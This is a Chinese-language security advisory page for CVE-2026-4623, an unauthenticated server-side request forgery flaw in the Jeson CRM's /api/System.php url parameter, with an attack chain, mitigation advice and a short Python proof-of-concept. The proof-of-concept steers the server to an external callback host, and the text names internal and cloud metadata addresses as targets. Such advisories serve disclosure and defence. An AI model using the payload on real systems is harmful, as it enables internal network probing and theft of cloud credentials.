IPBUF安全漏洞报告
English
CVE-2026-4623 CVSS 7.3 高危

CVE-2026-4623 Jeson CRM系统SSRF漏洞

披露日期: 2026-03-24
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4623
漏洞类型
服务端请求伪造 (SSRF)
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Jeson-Customer-Relationship-Management-System

相关标签

SSRFJeson-CRMServer-Side Request ForgeryCVE-2026-4623RCE

漏洞概述

DefaultFuction开发的Jeson客户关系管理系统(CRM)存在一个高危安全漏洞。该漏洞位于API模块的`/api/System.php`文件中,由于对`url`参数缺乏有效的过滤和验证,导致攻击者可以诱导服务器向内网或任意外部地址发起请求。由于该产品采用持续交付模式,受影响版本为特定提交之前的版本。攻击者无需身份认证即可远程利用此漏洞,可能导致敏感信息泄露、内网端口探测等风险,建议用户尽快修复。

技术细节

该漏洞的根源在于Jeson CRM系统的API处理逻辑中存在严重的输入验证缺失。具体而言,在处理`/api/System.php`文件的请求时,后端代码直接提取了用户通过GET或POST请求传入的`url`参数,并将其直接传递给底层的网络请求库(如cURL或file_get_contents函数)进行执行。系统未对目标URL的协议、域名或IP地址进行任何形式的白名单校验或黑名单过滤。
在利用方面,攻击者无需经过任何身份验证即可远程发起攻击。通过构造特定的HTTP请求,将`url`参数设置为内网敏感地址(如`http://127.0.0.1:22`用于探测SSH端口,或`http://169.254.169.254/latest/meta-data/`用于读取云元数据),攻击者可以强迫服务器向这些地址发起请求。由于请求是由服务器端发出的,它能够绕过网络边界防火墙对内网的访问限制,从而造成信息泄露、内网探测甚至结合其他漏洞实现远程代码执行。

攻击链分析

STEP 1
侦察阶段
攻击者识别目标系统正在运行Jeson-Customer-Relationship-Management-System,并定位到API接口文件。
STEP 2
漏洞利用
攻击者向`/api/System.php`发送特制的HTTP请求,在`url`参数中注入内网地址(如127.0.0.1)或恶意的外部回调地址。
STEP 3
服务端请求
服务器端接收到请求后,未加过滤地使用`url`参数值发起网络请求,充当攻击者的代理。
STEP 4
影响达成
攻击者通过分析响应时间、响应内容或外部服务器日志,获取内网敏感信息或确认漏洞存在。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_ssrf(target_url): """ PoC for CVE-2026-4623 SSRF Vulnerability Target: /api/System.php Parameter: url """ # Use a controlled external domain to verify the request (e.g., Burp Collaborator or interactsh) test_payload = "http://burpcollaborator.net/test" # Alternatively, test for internal access (e.g., localhost) # test_payload = "http://127.0.0.1:80" full_url = f"{target_url}/api/System.php" try: print(f"[*] Sending request to {full_url} with payload: {test_payload}") params = { "url": test_payload } response = requests.get(full_url, params=params, timeout=10) # Check if the response indicates that the request was processed # Validation usually depends on checking the external server logs for incoming connections print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Body: {response.text[:200]}") print("[*] Check your external server logs to see if the target initiated a connection.") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://localhost:8080" # Replace with actual target check_ssrf(target)

影响范围

Jeson-Customer-Relationship-Management-System <= commit 1b4679c

防御指南

临时缓解措施
在未应用补丁前,建议立即通过网络防火墙或安全组策略,限制该CRM系统服务器的出站流量。仅允许其访问业务必需的外部API地址,明确禁止其对内网地址(如本地回环地址、私有IP段)及云元数据服务的访问。此外,若业务允许,可临时禁用`/api/System.php`文件的访问权限以阻断攻击路径。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表